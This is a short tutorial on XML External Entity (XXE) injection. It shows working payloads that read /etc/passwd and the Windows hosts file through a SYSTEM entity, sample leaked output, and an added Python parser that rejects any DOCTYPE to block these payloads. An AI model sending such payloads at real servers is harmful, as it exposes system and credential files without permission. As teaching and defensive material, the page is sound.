XXE Injection
XML External Entity (XXE) injection discloses or retrieves arbitrary files from the target server's local filesystem by modifying the submitted XML document. It can often be the first step towards gaining Remote Code Execution (RCE).
A typical example of this vulnerability looks as follows: a site accepts XML input and parses it without properly securing or validating it.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY > <!--Allows any input without validation-->
<!ELEMENT name (#PCDATA)>
]>
<data>
<name>example</name>
</data>
We can send an XML request that pulls in a system file through an external ENTITY declaration:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <!-- Defining the External Entity-->
<data>
<name>&xxe;</name> <!--Calling the External Entity -->
</data>
With this, the contents of the requested file are reflected back in the response:
<data>
<name>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
</name>
</data>
The same can be done against Windows hosts:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///C:/windows/system32/drivers/etc/hosts">]>
<data>
<name>&xxe;</name>
</data>
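A server-side guard against the requests shown above, as an added example that is not part of the original page: a parser built on Python's standard-library expat module that refuses any DOCTYPE, which is the only place an ENTITY can be declared. The sample documents are constructed here from the page's payloads; nothing is read from disk.

```python
import xml.parsers.expat

# Constructed sample documents, modelled on the requests shown on this page.
SAFE_DOC = b'<?xml version="1.0"?><data><name>example</name></data>'
XXE_LINUX = (b'<?xml version="1.0"?>'
             b'<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
             b'<data><name>&xxe;</name></data>')
XXE_WINDOWS = (b'<?xml version="1.0"?><!DOCTYPE data [<!ENTITY xxe SYSTEM '
               b'"file:///C:/windows/system32/drivers/etc/hosts">]>'
               b'<data><name>&xxe;</name></data>')


class DoctypeRejected(ValueError):
    """Untrusted XML carried a DTD, the only place an ENTITY can be declared."""


def parse_untrusted(doc: bytes) -> dict:
    """Parse client XML into {element: text}, refusing any DOCTYPE.
    Expat calls StartDoctypeDeclHandler on '<!DOCTYPE' before any body entity
    reference is processed, so raising there stops the parse before a SYSTEM
    entity can be resolved; without a DTD, '&xxe;' is simply undeclared."""
    parser = xml.parsers.expat.ParserCreate()
    # Also refuse to fetch parameter entities from an external DTD subset.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    fields, stack = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE '{name}' is not allowed in client XML")

    def on_text(text):
        if stack:  # attribute character data to the innermost open element
            fields[stack[-1]] = fields.get(stack[-1], "") + text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda tag, attrs: stack.append(tag)
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = on_text
    parser.Parse(doc, True)
    return fields


def is_rejected(doc: bytes) -> bool:
    """True when the document is refused as a possible XXE carrier."""
    try:
        parse_untrusted(doc)
    except DoctypeRejected:
        return True
    return False
```

Both the Linux and the Windows payload above are refused before the entity reference is ever reached, while the plain document still parses to {'name': 'example'}.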